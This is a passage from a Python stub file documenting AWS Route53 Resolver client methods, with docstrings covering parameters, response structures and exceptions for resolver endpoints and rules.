'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
Response Structure
(dict) --
ResolverEndpoint (dict) --
The response to an AssociateResolverEndpointIpAddress request.
Id (string) --
The ID of the resolver endpoint.
CreatorRequestId (string) --
A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver endpoint.
Name (string) --
The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
SecurityGroupIds (list) --
The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
(string) --
Direction (string) --
Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
IpAddressCount (integer) --
The number of IP addresses that the resolver endpoint can use for DNS queries.
HostVPCId (string) --
The ID of the VPC that you want to create the resolver endpoint in.
Status (string) --
A code that specifies the current status of the resolver endpoint.
StatusMessage (string) --
A detailed description of the status of the resolver endpoint.
CreationTime (string) --
The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --
The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.ResourceExistsException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.LimitExceededException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
:returns:
(string) --
"""
pass
def associate_resolver_rule(ResolverRuleId=None, Name=None, VPCId=None):
"""
Associates a resolver rule with a VPC. When you associate a rule with a VPC, Resolver forwards all DNS queries for the domain name that is specified in the rule and that originate in the VPC. The queries are forwarded to the IP addresses for the DNS resolvers that are specified in the rule. For more information about rules, see CreateResolverRule .
See also: AWS API Documentation
Exceptions
:example: response = client.associate_resolver_rule(
ResolverRuleId='string',
Name='string',
VPCId='string'
)
:type ResolverRuleId: string
:param ResolverRuleId: [REQUIRED]\nThe ID of the resolver rule that you want to associate with the VPC. To list the existing resolver rules, use ListResolverRules .\n
:type Name: string
:param Name: A name for the association that you\'re creating between a resolver rule and a VPC.
:type VPCId: string
:param VPCId: [REQUIRED]\nThe ID of the VPC that you want to associate the resolver rule with.\n
:rtype: dict
ReturnsResponse Syntax
{
'ResolverRuleAssociation': {
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
}
}
Response Structure
(dict) --
ResolverRuleAssociation (dict) --
Information about the AssociateResolverRule request, including the status of the request.
Id (string) --
The ID of the association between a resolver rule and a VPC. Resolver assigns this value when you submit an AssociateResolverRule request.
ResolverRuleId (string) --
The ID of the resolver rule that you associated with the VPC that is specified by VPCId .
Name (string) --
The name of an association between a resolver rule and a VPC.
VPCId (string) --
The ID of the VPC that you associated the resolver rule with.
Status (string) --
A code that specifies the current status of the association between a resolver rule and a VPC.
StatusMessage (string) --
A detailed description of the status of the association between a resolver rule and a VPC.
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.ResourceUnavailableException
Route53Resolver.Client.exceptions.ResourceExistsException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverRuleAssociation': {
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
}
}
:returns:
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.ResourceUnavailableException
Route53Resolver.Client.exceptions.ResourceExistsException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_resolver_endpoint(CreatorRequestId=None, Name=None, SecurityGroupIds=None, Direction=None, IpAddresses=None, Tags=None):
"""
Creates a resolver endpoint. There are two types of resolver endpoints, inbound and outbound:
See also: AWS API Documentation
Exceptions
:example: response = client.create_resolver_endpoint(
CreatorRequestId='string',
Name='string',
SecurityGroupIds=[
'string',
],
Direction='INBOUND'|'OUTBOUND',
IpAddresses=[
{
'SubnetId': 'string',
'Ip': 'string'
},
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type CreatorRequestId: string
:param CreatorRequestId: [REQUIRED]\nA unique string that identifies the request and that allows failed requests to be retried without the risk of executing the operation twice. CreatorRequestId can be any unique string, for example, a date/time stamp.\n
:type Name: string
:param Name: A friendly name that lets you easily find a configuration in the Resolver dashboard in the Route 53 console.
:type SecurityGroupIds: list
:param SecurityGroupIds: [REQUIRED]\nThe ID of one or more security groups that you want to use to control access to this VPC. The security group that you specify must include one or more inbound rules (for inbound resolver endpoints) or outbound rules (for outbound resolver endpoints).\n\n(string) --\n\n
:type Direction: string
:param Direction: [REQUIRED]\nSpecify the applicable value:\n\nINBOUND : Resolver forwards DNS queries to the DNS service for a VPC from your network or another VPC\nOUTBOUND : Resolver forwards DNS queries from the DNS service for a VPC to your network or another VPC\n\n
:type IpAddresses: list
:param IpAddresses: [REQUIRED]\nThe subnets and IP addresses in your VPC that you want DNS queries to pass through on the way from your VPCs to your network (for outbound endpoints) or on the way from your network to your VPCs (for inbound resolver endpoints).\n\n(dict) --In an CreateResolverEndpoint request, a subnet and IP address that you want to use for DNS queries.\n\nSubnetId (string) -- [REQUIRED]The subnet that contains the IP address.\n\nIp (string) --The IP address that you want to use for DNS queries.\n\n\n\n\n
:type Tags: list
:param Tags: A list of the tag keys and values that you want to associate with the endpoint.\n\n(dict) --One tag that you want to add to the specified resource. A tag consists of a Key (a name for the tag) and a Value .\n\nKey (string) --The name for the tag. For example, if you want to associate Resolver resources with the account IDs of your customers for billing purposes, the value of Key might be account-id .\n\nValue (string) --The value for the tag. For example, if Key is account-id , then Value might be the ID of the customer account that you\'re creating the resource for.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
Response Structure
(dict) --
ResolverEndpoint (dict) --
Information about the CreateResolverEndpoint request, including the status of the request.
Id (string) --
The ID of the resolver endpoint.
CreatorRequestId (string) --
A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver endpoint.
Name (string) --
The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
SecurityGroupIds (list) --
The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
(string) --
Direction (string) --
Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
IpAddressCount (integer) --
The number of IP addresses that the resolver endpoint can use for DNS queries.
HostVPCId (string) --
The ID of the VPC that you want to create the resolver endpoint in.
Status (string) --
A code that specifies the current status of the resolver endpoint.
StatusMessage (string) --
A detailed description of the status of the resolver endpoint.
CreationTime (string) --
The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --
The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.ResourceExistsException
Route53Resolver.Client.exceptions.LimitExceededException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
:returns:
CreatorRequestId (string) -- [REQUIRED]
A unique string that identifies the request and that allows failed requests to be retried without the risk of executing the operation twice. CreatorRequestId can be any unique string, for example, a date/time stamp.
Name (string) -- A friendly name that lets you easily find a configuration in the Resolver dashboard in the Route 53 console.
SecurityGroupIds (list) -- [REQUIRED]
The ID of one or more security groups that you want to use to control access to this VPC. The security group that you specify must include one or more inbound rules (for inbound resolver endpoints) or outbound rules (for outbound resolver endpoints).
(string) --
Direction (string) -- [REQUIRED]
Specify the applicable value:
INBOUND : Resolver forwards DNS queries to the DNS service for a VPC from your network or another VPC
OUTBOUND : Resolver forwards DNS queries from the DNS service for a VPC to your network or another VPC
IpAddresses (list) -- [REQUIRED]
The subnets and IP addresses in your VPC that you want DNS queries to pass through on the way from your VPCs to your network (for outbound endpoints) or on the way from your network to your VPCs (for inbound resolver endpoints).
(dict) --In an CreateResolverEndpoint request, a subnet and IP address that you want to use for DNS queries.
SubnetId (string) -- [REQUIRED]The subnet that contains the IP address.
Ip (string) --The IP address that you want to use for DNS queries.
Tags (list) -- A list of the tag keys and values that you want to associate with the endpoint.
(dict) --One tag that you want to add to the specified resource. A tag consists of a Key (a name for the tag) and a Value .
Key (string) --The name for the tag. For example, if you want to associate Resolver resources with the account IDs of your customers for billing purposes, the value of Key might be account-id .
Value (string) --The value for the tag. For example, if Key is account-id , then Value might be the ID of the customer account that you\'re creating the resource for.
"""
pass
def create_resolver_rule(CreatorRequestId=None, Name=None, RuleType=None, DomainName=None, TargetIps=None, ResolverEndpointId=None, Tags=None):
"""
For DNS queries that originate in your VPCs, specifies which resolver endpoint the queries pass through, one domain name that you want to forward to your network, and the IP addresses of the DNS resolvers in your network.
See also: AWS API Documentation
Exceptions
:example: response = client.create_resolver_rule(
CreatorRequestId='string',
Name='string',
RuleType='FORWARD'|'SYSTEM'|'RECURSIVE',
DomainName='string',
TargetIps=[
{
'Ip': 'string',
'Port': 123
},
],
ResolverEndpointId='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type CreatorRequestId: string
:param CreatorRequestId: [REQUIRED]\nA unique string that identifies the request and that allows failed requests to be retried without the risk of executing the operation twice. CreatorRequestId can be any unique string, for example, a date/time stamp.\n
:type Name: string
:param Name: A friendly name that lets you easily find a rule in the Resolver dashboard in the Route 53 console.
:type RuleType: string
:param RuleType: [REQUIRED]\nSpecify FORWARD . Other resolver rule types aren\'t supported.\n
:type DomainName: string
:param DomainName: [REQUIRED]\nDNS queries for this domain name are forwarded to the IP addresses that you specify in TargetIps . If a query matches multiple resolver rules (example.com and www.example.com), outbound DNS queries are routed using the resolver rule that contains the most specific domain name (www.example.com).\n
:type TargetIps: list
:param TargetIps: The IPs that you want Resolver to forward DNS queries to. You can specify only IPv4 addresses. Separate IP addresses with a comma.\n\n(dict) --In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.\n\nIp (string) -- [REQUIRED]One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.\n\nPort (integer) --The port at Ip that you want to forward DNS queries to.\n\n\n\n\n
:type ResolverEndpointId: string
:param ResolverEndpointId: The ID of the outbound resolver endpoint that you want to use to route DNS queries to the IP addresses that you specify in TargetIps .
:type Tags: list
:param Tags: A list of the tag keys and values that you want to associate with the endpoint.\n\n(dict) --One tag that you want to add to the specified resource. A tag consists of a Key (a name for the tag) and a Value .\n\nKey (string) --The name for the tag. For example, if you want to associate Resolver resources with the account IDs of your customers for billing purposes, the value of Key might be account-id .\n\nValue (string) --The value for the tag. For example, if Key is account-id , then Value might be the ID of the customer account that you\'re creating the resource for.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
Response Structure
(dict) --
ResolverRule (dict) --
Information about the CreateResolverRule request, including the status of the request.
Id (string) --
The ID that Resolver assigned to the resolver rule when you created it.
CreatorRequestId (string) --
A unique string that you specified when you created the resolver rule. CreatorRequestId identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver rule specified by Id .
DomainName (string) --
DNS queries for this domain name are forwarded to the IP addresses that are specified in TargetIps . If a query matches multiple resolver rules (example.com and www.example.com), the query is routed using the resolver rule that contains the most specific domain name (www.example.com).
Status (string) --
A code that specifies the current status of the resolver rule.
StatusMessage (string) --
A detailed description of the status of a resolver rule.
RuleType (string) --
This value is always FORWARD . Other resolver rule types aren\'t supported.
Name (string) --
The name for the resolver rule, which you specified when you created the resolver rule.
TargetIps (list) --
An array that contains the IP addresses and ports that you want to forward
(dict) --
In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.
Ip (string) --
One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.
Port (integer) --
The port at Ip that you want to forward DNS queries to.
ResolverEndpointId (string) --
The ID of the endpoint that the rule is associated with.
OwnerId (string) --
When a rule is shared with another AWS account, the account ID of the account that the rule is shared with.
ShareStatus (string) --
Whether the rules is shared and, if so, whether the current account is sharing the rule with another account, or another account is sharing the rule with the current account.
Exceptions
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.LimitExceededException
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.ResourceExistsException
Route53Resolver.Client.exceptions.ResourceUnavailableException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
:returns:
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.LimitExceededException
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.ResourceExistsException
Route53Resolver.Client.exceptions.ResourceUnavailableException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
def delete_resolver_endpoint(ResolverEndpointId=None):
"""
Deletes a resolver endpoint. The effect of deleting a resolver endpoint depends on whether it\'s an inbound or an outbound resolver endpoint:
See also: AWS API Documentation
Exceptions
:example: response = client.delete_resolver_endpoint(
ResolverEndpointId='string'
)
:type ResolverEndpointId: string
:param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to delete.\n
:rtype: dict
ReturnsResponse Syntax{
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
Response Structure
(dict) --
ResolverEndpoint (dict) --Information about the DeleteResolverEndpoint request, including the status of the request.
Id (string) --The ID of the resolver endpoint.
CreatorRequestId (string) --A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --The ARN (Amazon Resource Name) for the resolver endpoint.
Name (string) --The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
SecurityGroupIds (list) --The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
(string) --
Direction (string) --Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
IpAddressCount (integer) --The number of IP addresses that the resolver endpoint can use for DNS queries.
HostVPCId (string) --The ID of the VPC that you want to create the resolver endpoint in.
Status (string) --A code that specifies the current status of the resolver endpoint.
StatusMessage (string) --A detailed description of the status of the resolver endpoint.
CreationTime (string) --The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
:returns:
(string) --
"""
pass
def delete_resolver_rule(ResolverRuleId=None):
"""
Deletes a resolver rule. Before you can delete a resolver rule, you must disassociate it from all the VPCs that you associated the resolver rule with. For more infomation, see DisassociateResolverRule .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_resolver_rule(
ResolverRuleId='string'
)
:type ResolverRuleId: string
:param ResolverRuleId: [REQUIRED]\nThe ID of the resolver rule that you want to delete.\n
:rtype: dict
ReturnsResponse Syntax{
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
Response Structure
(dict) --
ResolverRule (dict) --Information about the DeleteResolverRule request, including the status of the request.
Id (string) --The ID that Resolver assigned to the resolver rule when you created it.
CreatorRequestId (string) --A unique string that you specified when you created the resolver rule. CreatorRequestId identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --The ARN (Amazon Resource Name) for the resolver rule specified by Id .
DomainName (string) --DNS queries for this domain name are forwarded to the IP addresses that are specified in TargetIps . If a query matches multiple resolver rules (example.com and www.example.com), the query is routed using the resolver rule that contains the most specific domain name (www.example.com).
Status (string) --A code that specifies the current status of the resolver rule.
StatusMessage (string) --A detailed description of the status of a resolver rule.
RuleType (string) --This value is always FORWARD . Other resolver rule types aren\'t supported.
Name (string) --The name for the resolver rule, which you specified when you created the resolver rule.
TargetIps (list) --An array that contains the IP addresses and ports that you want to forward
(dict) --In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.
Ip (string) --One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.
Port (integer) --The port at Ip that you want to forward DNS queries to.
ResolverEndpointId (string) --The ID of the endpoint that the rule is associated with.
OwnerId (string) --When a rule is shared with another AWS account, the account ID of the account that the rule is shared with.
ShareStatus (string) --Whether the rules is shared and, if so, whether the current account is sharing the rule with another account, or another account is sharing the rule with the current account.
Exceptions
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.ResourceInUseException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
"""
pass
def disassociate_resolver_endpoint_ip_address(ResolverEndpointId=None, IpAddress=None):
"""
Removes IP addresses from an inbound or an outbound resolver endpoint. If you want to remove more than one IP address, submit one DisassociateResolverEndpointIpAddress request for each IP address.
To add an IP address to an endpoint, see AssociateResolverEndpointIpAddress .
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_resolver_endpoint_ip_address(
ResolverEndpointId='string',
IpAddress={
'IpId': 'string',
'SubnetId': 'string',
'Ip': 'string'
}
)
:type ResolverEndpointId: string
:param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to disassociate an IP address from.\n
:type IpAddress: dict
:param IpAddress: [REQUIRED]\nThe IPv4 address that you want to remove from a resolver endpoint.\n\nIpId (string) --\nOnly when removing an IP address from a resolver endpoint : The ID of the IP address that you want to remove. To get this ID, use GetResolverEndpoint .\n\nSubnetId (string) --The ID of the subnet that includes the IP address that you want to update. To get this ID, use GetResolverEndpoint .\n\nIp (string) --The new IP address.\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
Response Structure
(dict) --
ResolverEndpoint (dict) --
The response to an DisassociateResolverEndpointIpAddress request.
Id (string) --
The ID of the resolver endpoint.
CreatorRequestId (string) --
A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver endpoint.
Name (string) --
The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
SecurityGroupIds (list) --
The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
(string) --
Direction (string) --
Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
IpAddressCount (integer) --
The number of IP addresses that the resolver endpoint can use for DNS queries.
HostVPCId (string) --
The ID of the VPC that you want to create the resolver endpoint in.
Status (string) --
A code that specifies the current status of the resolver endpoint.
StatusMessage (string) --
A detailed description of the status of the resolver endpoint.
CreationTime (string) --
The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --
The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.ResourceExistsException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
:returns:
(string) --
"""
pass
def disassociate_resolver_rule(VPCId=None, ResolverRuleId=None):
"""
Removes the association between a specified resolver rule and a specified VPC.
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_resolver_rule(
VPCId='string',
ResolverRuleId='string'
)
:type VPCId: string
:param VPCId: [REQUIRED]\nThe ID of the VPC that you want to disassociate the resolver rule from.\n
:type ResolverRuleId: string
:param ResolverRuleId: [REQUIRED]\nThe ID of the resolver rule that you want to disassociate from the specified VPC.\n
:rtype: dict
ReturnsResponse Syntax
{
'ResolverRuleAssociation': {
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
}
}
Response Structure
(dict) --
ResolverRuleAssociation (dict) --
Information about the DisassociateResolverRule request, including the status of the request.
Id (string) --
The ID of the association between a resolver rule and a VPC. Resolver assigns this value when you submit an AssociateResolverRule request.
ResolverRuleId (string) --
The ID of the resolver rule that you associated with the VPC that is specified by VPCId .
Name (string) --
The name of an association between a resolver rule and a VPC.
VPCId (string) --
The ID of the VPC that you associated the resolver rule with.
Status (string) --
A code that specifies the current status of the association between a resolver rule and a VPC.
StatusMessage (string) --
A detailed description of the status of the association between a resolver rule and a VPC.
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverRuleAssociation': {
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
}
}
:returns:
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_resolver_endpoint(ResolverEndpointId=None):
"""
Gets information about a specified resolver endpoint, such as whether it\'s an inbound or an outbound resolver endpoint, and the current status of the endpoint.
See also: AWS API Documentation
Exceptions
:example: response = client.get_resolver_endpoint(
ResolverEndpointId='string'
)
:type ResolverEndpointId: string
:param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to get information about.\n
:rtype: dict
ReturnsResponse Syntax{
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
